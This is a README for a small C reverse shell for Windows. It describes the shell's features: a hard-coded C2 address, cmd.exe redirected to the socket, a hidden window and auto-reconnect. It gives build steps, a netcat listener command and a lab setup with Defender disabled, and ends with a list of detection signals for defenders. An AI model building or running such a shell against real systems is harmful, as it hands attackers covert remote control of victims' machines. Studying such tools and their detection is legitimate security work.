⚠️ DISCLAIMER This project is provided strictly for educational purposes — for learning how TCP reverse shells work, how Winsock2 sockets interact with process I/O redirection, and how defenders can detect such behavior.Do NOT use this code on any system you do not own or do not have explicit written permission to test. Unauthorized use is illegal in most jurisdictions. The author takes no responsibility for misuse.
A minimal Windows reverse shell implemented in C using the Win32 API.
It connects back to a listener (e.g. nc -lvnp 4444), then spawns cmd.exe
with stdin / stdout / stderr redirected to the socket — effectively
giving the operator an interactive shell over TCP.
This repo exists to demonstrate:
- Basic Winsock2 client socket programming
STARTUPINFO+CreateProcessAhandle inheritance for I/O redirection- Simple persistence loop with retry
- Single-instance enforcement via named mutex
| Feature | Description |
|---|---|
| TCP reverse connection | Connects to a hard-coded C2 IP/port |
| I/O redirection | cmd.exe stdin/stdout/stderr bound to socket |
| Hidden window | SW_HIDE — no visible console |
| Auto-retry | Reconnects every 10 seconds if connection drops |
| Single instance | Named mutex prevents duplicate execution |
| Socket timeouts | 5s send/recv timeout to avoid hangs |
- Windows 10/11
- MSVC (Visual Studio 2019/2022) or MinGW-w64
ws2_32.lib(linked automatically via#pragma comment)
cl /EHsc revshell.cpp /link ws2_32.libx86_64-w64-mingw32-g++ revshell.cpp -o revshell.exe -lws2_32 -mwindows-
Set your listener IP/port in the source:
#define C2_IP "192.168.132.132" #define C2_PORT 4444
-
Start a listener on the attacker VM (Linux):
nc -lvnp 4444
-
Run the binary on the target Windows VM inside your isolated lab.
-
You should receive an interactive
cmd.exeprompt.
- Two VMs on an isolated host-only / NAT network:
- Attacker: Kali Linux
- Victim: Windows 10 (with Defender disabled or exclusions set)
- Never run this on a production or public network.
If you're studying this from a defensive angle, common detection signals include:
- Outbound TCP connection from
cmd.exeor an unsigned process on unusual ports CreateProcesswith inherited socket handles (STARTF_USESTDHANDLES)WinMain+-mwindowsbinaries with no visible UI- Named mutex creation patterns (
Global\RevShellInstance) - Sysmon Event ID 3 (network connect) correlated with Event ID 1 (process create)
.
├── reverseshell.c # main source
└── README.md
MIT — for educational use only. See disclaimer above.